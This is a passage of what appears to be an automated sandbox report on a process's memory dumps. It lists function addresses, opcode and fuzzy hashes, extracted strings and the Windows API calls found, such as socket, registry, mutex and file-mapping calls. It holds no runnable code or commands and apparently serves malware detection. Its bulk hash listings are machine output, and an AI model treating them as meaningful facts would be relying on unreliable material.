Instruction Fuzzy Hash: EAE2CBB4E002288FDB64DF28D954B99BBB2FB88315F1585EAD409E7350DB319EA1CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05F4EAD0, Relevance: 7.0, Strings: 5, Instructions: 786COMMON

Download Yara Rule

Strings

$%ir, xrefs: 05F4ED51
X1kr, xrefs: 05F4EFD0
$%ir, xrefs: 05F4F47D
X1kr, xrefs: 05F4EDEB
$%ir, xrefs: 05F4F5CC

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID: $%ir$$%ir$$%ir$X1kr$X1kr
API String ID: 0-2692412591
Opcode ID: 356168baa364690bbb0f673d0db9a636d45619e77bd94e847fedfa718065b8bf
Instruction ID: 69bd28a9bc80f46e85797ea86252e169a8b58280fe702fbf00a8b5789ee2381e
Opcode Fuzzy Hash: 356168baa364690bbb0f673d0db9a636d45619e77bd94e847fedfa718065b8bf
Instruction Fuzzy Hash: 01726175E00219DFDB54CF68C951BADBBB7BB88300F1084AAD60AAB390DB749D85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05F4BE50, Relevance: 2.8, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

X1kr, xrefs: 05F4CB8D
aMA, xrefs: 05F4C873

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID: X1kr$aMA
API String ID: 0-1444935975
Opcode ID: a82705fd8af47750737da6a5ea9dfd37a5597cbe83f1e3d547235e1bedbd844a
Instruction ID: 423c1cf88d1fd49c75d99346a11cf4735a96c94af4fc53003bd50846286a94bc
Opcode Fuzzy Hash: a82705fd8af47750737da6a5ea9dfd37a5597cbe83f1e3d547235e1bedbd844a
Instruction Fuzzy Hash: 38E12974E01219CFDB64DFA9C884B9DBBF2BF88300F2485AAD509AB355DB349D818F50

Uniqueness

Uniqueness Score: -1.00%

Function 04FA9498, Relevance: 1.8, APIs: 1, Instructions: 295libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA94DC

Memory Dump Source

Source File: 00000003.00000002.475672419.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7996f6779925719aad7f739d9367719dcccf9be72eb3183360cc7316d74a981c
Instruction ID: 2a3918c0040972b514059c6e8bb7668b1668bdebae0754543e98260b8b5a3d52
Opcode Fuzzy Hash: 7996f6779925719aad7f739d9367719dcccf9be72eb3183360cc7316d74a981c
Instruction Fuzzy Hash: FAC181B4B00215CFDB04DFA8D554AADBBF2AF84314F558839D406AB350DB74ED92CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05F4A148, Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5353ef141830b0924663cacc7a7d78adb2cd8cd0b4763c1e81afca6a75bd0d9d
Instruction ID: 96126e6984752168e4559cb8615645a2b5ac3820905bed5efa4ec9ea5f047d52
Opcode Fuzzy Hash: 5353ef141830b0924663cacc7a7d78adb2cd8cd0b4763c1e81afca6a75bd0d9d
Instruction Fuzzy Hash: 04E1A475F402049BDB08DBB9C950BAEBBE7AFC4704F148569E506EB390DE39DD428B50

Uniqueness

Uniqueness Score: -1.00%

Function 05F4B250, Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2caecc6dab0aa5aa16cb8769533b55c4f1ccb228d4c1515ffd7f8317f20c540a
Instruction ID: df6baf4141cae7a501560ade27b60822692135d0bc1d6db9a43ebcd189b15ec5
Opcode Fuzzy Hash: 2caecc6dab0aa5aa16cb8769533b55c4f1ccb228d4c1515ffd7f8317f20c540a
Instruction Fuzzy Hash: 98B18D70B102158BDF18DBB9C9506AEBAE7AF84300F50857AD506EB395EF34DD42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 05F4AED0, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f9649dab89c5388952f6b86e4f284ba94659fc7a4b646a40432feddfa68fad4
Instruction ID: 588deb44580242c658e7c335c2c7e8e3812882baaeaa0b7ffb3e7b4e767255a0
Opcode Fuzzy Hash: 8f9649dab89c5388952f6b86e4f284ba94659fc7a4b646a40432feddfa68fad4
Instruction Fuzzy Hash: F071D474B002058FDB48EB78C9505AEBBE7EFC4210F14852AE51AD7385DF38ED568B92

Uniqueness

Uniqueness Score: -1.00%

Function 05F45B90, Relevance: 5.1, Strings: 4, Instructions: 148COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 05F45A99
X1kr, xrefs: 05F45F17
:@Dr, xrefs: 05F45A7E
X1kr, xrefs: 05F45BFB

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID: :@Dr$:@Dr$X1kr$X1kr
API String ID: 0-594750528
Opcode ID: f044564be9d26c82d1e09cb4b36f4b6f5aba0cb730b30604634208cb879ebdd5
Instruction ID: 9c49acdea6e58c8f51929ef2663846526a74daf5c3fa00088e5fb63d0dc11387
Opcode Fuzzy Hash: f044564be9d26c82d1e09cb4b36f4b6f5aba0cb730b30604634208cb879ebdd5
Instruction Fuzzy Hash: C641F835B042448BDB64EFB9C881B6E7FF2AB85710F29C16AD5059B341DA79DC02CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05F457ED, Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

X1kr, xrefs: 05F45F17
X1kr, xrefs: 05F4581D

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID: X1kr$X1kr
API String ID: 0-2397868964
Opcode ID: 464751cf5405f04e41138174f808d8e29c3faef588b07d94a048386a41eee8e2
Instruction ID: de42b192c8e5fc99576c13adbbcff89aad7b66322501c035747903b8233f9f5a
Opcode Fuzzy Hash: 464751cf5405f04e41138174f808d8e29c3faef588b07d94a048386a41eee8e2
Instruction Fuzzy Hash: F151D479F002589FDB24EBB8C881B6EBFF2AB84310F19C06AD5459B341DA799C45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04FA4BBF, Relevance: 1.7, APIs: 1, Instructions: 219COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 04FA4CA9

Memory Dump Source

Source File: 00000003.00000002.475672419.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7aeaae46941982930398642cc58cc058b86126f2c9a9a9a94f68056ae468bbc1
Instruction ID: a21ce2365c094cd004979c9d997450212651141ba2ea700789c5da4e57e10e78
Opcode Fuzzy Hash: 7aeaae46941982930398642cc58cc058b86126f2c9a9a9a94f68056ae468bbc1
Instruction Fuzzy Hash: 77A1CCB4E002249FDB54DF64DD546ADBBB2EB88311F1185AAD80AE3350EF346EA1CF45

Uniqueness

Uniqueness Score: -1.00%

Function 04FA4BEF, Relevance: 1.7, APIs: 1, Instructions: 216COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 04FA4CA9

Memory Dump Source

Source File: 00000003.00000002.475672419.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b8b7b9845f35e4dc1566a70e61ff522f063830675a769ec25b14efc926bfaec5
Instruction ID: c82c89136fdf70d558da69f1cd95a2ec176e635e006398438f8bbff3588ac678
Opcode Fuzzy Hash: b8b7b9845f35e4dc1566a70e61ff522f063830675a769ec25b14efc926bfaec5
Instruction Fuzzy Hash: C2A1EDB4E002289FDB54DF64DC586ADBBB2EB88311F1145AAD40AE3350EF346EA1CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05F331C8, Relevance: 1.7, APIs: 1, Instructions: 206libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05F33266

Memory Dump Source

Source File: 00000003.00000002.476085310.0000000005F30000.00000040.00000001.sdmp, Offset: 05F30000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5e2bcb2d88386656cfaab9a124ade641959c91da9c13a6095f84f19a6112f39
Instruction ID: 3e2e5277cc2be36863c6a8688c903ad59ad8ff22adf619d7339622fea1c963eb
Opcode Fuzzy Hash: c5e2bcb2d88386656cfaab9a124ade641959c91da9c13a6095f84f19a6112f39
Instruction Fuzzy Hash: 92719F71B102489FDB04DBB8C951AAEBBE6BF88304F14896AE506DB384DF34DD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04FA4C43, Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 04FA4CA9

Memory Dump Source

Source File: 00000003.00000002.475672419.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 04016ef298d26bec983d4f1d2a987af14a22fa1dc484b230a82dce6dfc442a75
Instruction ID: 71b114f7397fd7b04416e7133d648dcd3f8b7f26e6febcc6916c882477590193
Opcode Fuzzy Hash: 04016ef298d26bec983d4f1d2a987af14a22fa1dc484b230a82dce6dfc442a75
Instruction Fuzzy Hash: 4B91FFB4E002289FDB54DF68DD546ADBBB2EB88301F1145AAD40AE3350EF346EA1CF45

Uniqueness

Uniqueness Score: -1.00%

Function 05F331B8, Relevance: 1.7, APIs: 1, Instructions: 198libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05F33266

Memory Dump Source

Source File: 00000003.00000002.476085310.0000000005F30000.00000040.00000001.sdmp, Offset: 05F30000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d987ed54b45c8310bc8a62ee5f264e81e131fa82a2d684121f536071e07ab04
Instruction ID: 6d3c2cb1a96c262989c57adaa466c2c8d8f8d3d0d3314cc1eecb983ac5bdb3b5
Opcode Fuzzy Hash: 6d987ed54b45c8310bc8a62ee5f264e81e131fa82a2d684121f536071e07ab04
Instruction Fuzzy Hash: 41718E71B102049FEB04DB78C951AAEBBB6EF88304F15896AE506EB384DF74DD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04FA4C8E, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 04FA4CA9

Memory Dump Source

Source File: 00000003.00000002.475672419.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 57b6f8b704e93a768e6b708d59681787a27cc4a3a2663f9720cd38898663e487
Instruction ID: fa67d1bc7ae5a55dd607fdf573169796bba29c06c867331e849c251e95015bcd
Opcode Fuzzy Hash: 57b6f8b704e93a768e6b708d59681787a27cc4a3a2663f9720cd38898663e487
Instruction Fuzzy Hash: 8791F0B4E002249FDB54EF64DD546ADBBB2EB88305F1155AAD40AE3350DF346EA1CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05871D3D, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05871E4D

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: ffbadf68d75ec7d1c4cdfc08f56eaee9de635f6d69b95a2db0b3ded0ecbc5977
Instruction ID: 5971d1804e75dd52c9a6135fecf9e8c7ef224e2fb7fd7f8bf2a120b74d2b85e2
Opcode Fuzzy Hash: ffbadf68d75ec7d1c4cdfc08f56eaee9de635f6d69b95a2db0b3ded0ecbc5977
Instruction Fuzzy Hash: 0A41A5715093806FE712CB65DC45F52FFB8EF46610F18849BEE84DB153D365A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 058717CD, Relevance: 1.6, APIs: 1, Instructions: 113networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 05871896

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 1bbdf82a2ac0cea92f29b8c40edfabbd70a9cf1351b19af8bf2ab2d86eb2db76
Instruction ID: 0c4c524661b44a0bac0404a40b2f16ea4b31ca1345e475af330b68c7e0f466b6
Opcode Fuzzy Hash: 1bbdf82a2ac0cea92f29b8c40edfabbd70a9cf1351b19af8bf2ab2d86eb2db76
Instruction Fuzzy Hash: 7041797140D3C4AFD7228B618C59B66BFB4AF07210F0985DBE9848E5A3C225A809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0587269F, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 05872773

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: f457849af0c78d3ebf6bb4a2bec684f6fa0fb9f3eaab410ab8dc03be133e5a77
Instruction ID: 4c44e04888402d29ed57b0ac0b09c344fd6bfa28e78ba26803198f049a0877d5
Opcode Fuzzy Hash: f457849af0c78d3ebf6bb4a2bec684f6fa0fb9f3eaab410ab8dc03be133e5a77
Instruction Fuzzy Hash: EE31C3B1004344AFF7218B21CC85FA6BFACEF46710F14899AFA849B182D375A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05872418, Relevance: 1.6, APIs: 1, Instructions: 95timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 058724B5

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: c0d0d5c5b40bb47f332148be383091955aea163cac34bbfa772e4372dfffa5ee
Instruction ID: e1020443e518ff34e909654174c7ab59d5af0aefa14773edda55a19c78f22bdc
Opcode Fuzzy Hash: c0d0d5c5b40bb47f332148be383091955aea163cac34bbfa772e4372dfffa5ee
Instruction Fuzzy Hash: 9531D676409380AFE7228F25DC45F56BFB8EF46310F08849BE985DF192D325A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05872951, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05872A05

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 429f5764e8c54f7ea7956df67e3b8df04212bd4ebaf04afc745637bde18079cd
Instruction ID: d69fdb490eb4294a8f83dd1b9ea0ae0023728d5dd3e917d93f048a6fc000a98f
Opcode Fuzzy Hash: 429f5764e8c54f7ea7956df67e3b8df04212bd4ebaf04afc745637bde18079cd
Instruction Fuzzy Hash: 30318E75508784AFEB228F25DC40F62BFB8EF06310F08849AED859B162D334E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05870AD3, Relevance: 1.6, APIs: 1, Instructions: 91registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05870B88

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4622a51c2ff8aa6576625710b96c3a205bfd0fa9598a1789a592931dd62143fd
Instruction ID: 9a44389f45133898de9128ec174fbf0286cdb65c737e8fc2b007c6a130f07b76
Opcode Fuzzy Hash: 4622a51c2ff8aa6576625710b96c3a205bfd0fa9598a1789a592931dd62143fd
Instruction Fuzzy Hash: 7D317271509384AFEB12CF65CC44F96BFB8AF46310F08899AE9859B152D364E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05870758, Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 058707F9

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bac5a7c79a99012308ee1976712103368f7cb4dbf968ba4d43231c759e3e9778
Instruction ID: b0098aba9b10eeb4fee61b15e186c038c0ca0ca1239fe2a1f1a6b97b75f5bfc7
Opcode Fuzzy Hash: bac5a7c79a99012308ee1976712103368f7cb4dbf968ba4d43231c759e3e9778
Instruction Fuzzy Hash: D9316BB1504384AFE722CF65DC44F66BFE8EF45610F0884AEED858B252D375E809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05871EA4, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 05871F56

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: aac45bd88c473803cb30024b229ebc697a65583d7053980696734b85b94c0b46
Instruction ID: 70cd82086cd260a9f4b70aca7fa56cc6aeb815e0ffba3fdd0e8138bb05a44500
Opcode Fuzzy Hash: aac45bd88c473803cb30024b229ebc697a65583d7053980696734b85b94c0b46
Instruction Fuzzy Hash: 3731D6B2404784AFE722CB55DC45F96FFF8FF06320F04859AE9848B252D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05871B0E, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05871BB8

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7280d9a52095f0f7ef1fcb6dc4d847b6da0598f58eeac5c7272fa6b3aa79b58c
Instruction ID: 979c1f887e5d6ea800326494c2b08dd517a3718fbd34636eb3ea3110c05b0050
Opcode Fuzzy Hash: 7280d9a52095f0f7ef1fcb6dc4d847b6da0598f58eeac5c7272fa6b3aa79b58c
Instruction Fuzzy Hash: 8C318072509384AFE7228B65DC44F92BFB8EF46310F0884DBE985DB163D264E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05872159, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 058721F9

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 0e270ea6e326d7fdff607e388fcfdf8e8e879548d4928995400a25c6f089d8e0
Instruction ID: 0435073e0981767d6dfcbbc9cc7f75b16ed0c3ccfa37a1ef1c2e68b0b5465f12
Opcode Fuzzy Hash: 0e270ea6e326d7fdff607e388fcfdf8e8e879548d4928995400a25c6f089d8e0
Instruction Fuzzy Hash: 9B31B1B1509384AFE712CF25CC44F56FFE8EF05210F08849AED85CB292D364E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 058726CE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 05872773

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 9a5e1b5bdf125e5eeb42a3b3325b08d3f237523acfb285d2ca329be0f3f0a643
Instruction ID: 5588652cf5ea34d90490c2432f287b4b57bd46601da4c4e6966bcd36dea4a427
Opcode Fuzzy Hash: 9a5e1b5bdf125e5eeb42a3b3325b08d3f237523acfb285d2ca329be0f3f0a643
Instruction Fuzzy Hash: 0921D1B1500304BFFB21DB24CD85FA6FBACEF44710F10895AFE459A281D7B4A9498BB1

Uniqueness

Uniqueness Score: -1.00%

Function 058709EA, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05870A7E

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b5f26111612568553ea9076f48913db4bd2f23206e63979f9e494233555924bf
Instruction ID: 4c6b6564cb66535059ad388e42ab69128c626704b923b52f890fbef61d6ccb2e
Opcode Fuzzy Hash: b5f26111612568553ea9076f48913db4bd2f23206e63979f9e494233555924bf
Instruction Fuzzy Hash: 5C21BFB2505344AFE7218F24DC44F67FFA8EF45710F08889AFE44DB252D264E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05872250, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 058722E4

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 67cf1b97c894393b1c276d7c9d38e696488e6c2721a46c669291388551243936
Instruction ID: 13ce49e153fd494d3306c70183c842cae18418e6b088adba2ecbf7df05d0e96d
Opcode Fuzzy Hash: 67cf1b97c894393b1c276d7c9d38e696488e6c2721a46c669291388551243936
Instruction Fuzzy Hash: 8A21F1B1405784AFE712CB14DC85F66BFA8FF42320F08819BEA449F192D324A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05871563, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 05871606

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8a5afb8d8bcacf9624dedeef686c1bf093f70c34f67d8f1b568fde7280288205
Instruction ID: f0dc671343acb7357d30a4b877d11bdd25dde4db7ef16b2a184690b96387a511
Opcode Fuzzy Hash: 8a5afb8d8bcacf9624dedeef686c1bf093f70c34f67d8f1b568fde7280288205
Instruction Fuzzy Hash: F421B5755093C06FD3138B259C51B62BFB4EF87610F0A81CBE9848B653D225A919D7B2

Uniqueness

Uniqueness Score: -1.00%

Function 05870918, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNELBASE(?,00000E2C,?,?), ref: 058709BE

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 3385a68ca883d7a13e94bffb9a76b466207bcac33261e3a72a42cda285990470
Instruction ID: 68c8c24e806b1e347f1693081bf3033ed2d78c661bdc74eee8670d0ca85358e8
Opcode Fuzzy Hash: 3385a68ca883d7a13e94bffb9a76b466207bcac33261e3a72a42cda285990470
Instruction Fuzzy Hash: 1D21716550E3C06FC3138B358C55A21BFB4EF87A10F1D81DFD9848B6A3D225A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0587077A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 058707F9

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a7b907844d4e530b0f0e66052a9d9458df69b531e99319b70ed18ee1b8927b8
Instruction ID: 783d035c218640b2436bb30d85feffaebe1ad00f4b33f6ad8ae52334b3db537b
Opcode Fuzzy Hash: 8a7b907844d4e530b0f0e66052a9d9458df69b531e99319b70ed18ee1b8927b8
Instruction Fuzzy Hash: 52216B71504648AFE721DF65DC49F66FBE8EF04610F14846AEE898A252D771E804CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05870D3C, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05870DCD

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f97c51e316bf9b33119d98b992cd6c55748ebe9f3edf64085d155c55d3259645
Instruction ID: 2aeb7d34652bd75e62d25f1449576948891a221322cc103ca418ccbf02ad51df
Opcode Fuzzy Hash: f97c51e316bf9b33119d98b992cd6c55748ebe9f3edf64085d155c55d3259645
Instruction Fuzzy Hash: 6521A472409384AFD7228F65DC44F56BFB8EF46314F18849BEA849B153C265A909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0587287E, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05872907

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 278789c12ecfdf5d3705e6af6bfade1b387d00350d9216da71e052b255e62ded
Instruction ID: d9fc026645ac865bd89fb30ec11b0a055aa249bac3ab25d4ac88355f7de4b6b4
Opcode Fuzzy Hash: 278789c12ecfdf5d3705e6af6bfade1b387d00350d9216da71e052b255e62ded
Instruction Fuzzy Hash: C421A171409384AFE7128B65DC44F96BFB8EF46310F18849BEA849F152D374A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 058718EF, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 0587196C

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 8e87ba4e462193bdf4cdb3dc00e6c68608b58c5b05e1d37437302c92150f283a
Instruction ID: 520c1a5ce3443f8b8d6d136b52691ea05bc851ef81c12fb523e8793d64661617
Opcode Fuzzy Hash: 8e87ba4e462193bdf4cdb3dc00e6c68608b58c5b05e1d37437302c92150f283a
Instruction Fuzzy Hash: B321BC310093C4AFDB128F65DC84A62BFB0EF07320F0D84DADA848F163C325A919DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05870A0A, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05870A7E

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e10995563a7f9eab58d90bea47db5d70398b1674da11110bef6673c8ecafcc41
Instruction ID: c42f75deb215f8ca636645aa9c1c8e089ab8f660b338bb0dc9690c03faba0c11
Opcode Fuzzy Hash: e10995563a7f9eab58d90bea47db5d70398b1674da11110bef6673c8ecafcc41
Instruction Fuzzy Hash: C0216F71501704EFEB20DF65DC45F6BFBA8EF44710F18885AEE45DA241D674E9088A71

Uniqueness

Uniqueness Score: -1.00%

Function 05872C18, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05872CAD

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: a209b12562897f668887af05fcae3ed7e34659663f6a641daf11aab9b224ab11
Instruction ID: 1db62dd975a67db4b8d5504a5df3ab4c4444179878f35390204b00b89260c3d7
Opcode Fuzzy Hash: a209b12562897f668887af05fcae3ed7e34659663f6a641daf11aab9b224ab11
Instruction Fuzzy Hash: 0821D671408384AFDB228B11DC44F66FFB8EF46314F08849BEA849B153C375A908CB71

Uniqueness

Uniqueness Score: -1.00%

